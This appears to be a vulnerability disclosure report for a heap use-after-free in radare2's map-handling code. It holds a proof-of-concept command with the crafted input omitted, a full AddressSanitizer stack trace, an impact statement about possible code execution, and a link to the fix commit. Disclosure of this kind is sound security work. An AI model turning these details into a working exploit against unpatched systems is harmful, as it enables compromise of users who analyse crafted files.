Use After Free in radareorg/radare2
Valid
Reported on Feb 9th 2022
Description
Use After Free occurs in r_io_bank_map_add_top().
commit: 4d75eeb99a0d913e9b443e7aaf73aa44a323739d
Proof of Concept
$ echo -ne "<base64-encoded PoC file from the original report, omitted here>" | base64 -d > poc
ASAN
$ ASAN_OPTIONS=detect_odr_violation=0 r2 poc
=================================================================
==1491342==ERROR: AddressSanitizer: heap-use-after-free on address 0x604001aa6ff0 at pc 0x7fea015cecb8 bp 0x7ffc3b311b00 sp 0x7ffc3b311af8
READ of size 8 at 0x604001aa6ff0 thread T0
#0 0x7fea015cecb7 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:229:18
#1 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
#2 0x7fe9fe860af0 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2697:16
#3 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
#4 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
#5 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
#6 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
#7 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
#8 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
#9 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
#10 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x55bb78c8b2cd in _start (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x1d2cd)
0x604001aa6ff0 is located 32 bytes inside of 40-byte region [0x604001aa6fd0,0x604001aa6ff8)
freed by thread T0 here:
#0 0x55bb78d05f22 in free (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x97f22)
#1 0x7fea01cd56c9 in r_crbtree_take /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:359:3
#2 0x7fea01cd6bf6 in r_crbtree_delete /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:376:9
#3 0x7fea015cee82 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:233:12
#4 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
#5 0x7fe9fe860af0 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2697:16
#6 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
#7 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
#8 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
#9 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
#10 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
#11 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
#12 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
#13 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
previously allocated by thread T0 here:
#0 0x55bb78d06302 in calloc (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x98302)
#1 0x7fea01cd422e in _node_new /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:104:18
#2 0x7fea01cd392b in r_crbtree_insert /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:161:8
#3 0x7fea015ce220 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:175:8
#4 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
#5 0x7fea015b09c8 in r_io_open_at /home/alkyne/fuzzing/r2-debug/libr/io/io.c:90:2
#6 0x7fe9fe860e63 in io_create_mem_map /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2645:10
#7 0x7fe9fe860892 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2676:8
#8 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
#9 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
#10 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
#11 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
#12 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
#13 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
#14 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
#15 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:229:18 in r_io_bank_map_add_top
==1491342==ABORTING
Impact
A use-after-free of this kind may be exploitable and could allow an attacker to execute arbitrary code in the context of the process loading the crafted file.
We are processing your report and will contact the radareorg/radare2 team within 24 hours.
a year ago
alkyne Choi modified the report
a year ago
We have sent a fix follow-up to the radareorg/radare2 team. We will try again in 7 days.
a year ago
Actually I found a better (proper) fix to this funky bug. Here's the right commit: https://github.com/radareorg/radare2/commit/3345147916b9bb3da225248d571cdbac690c0c4d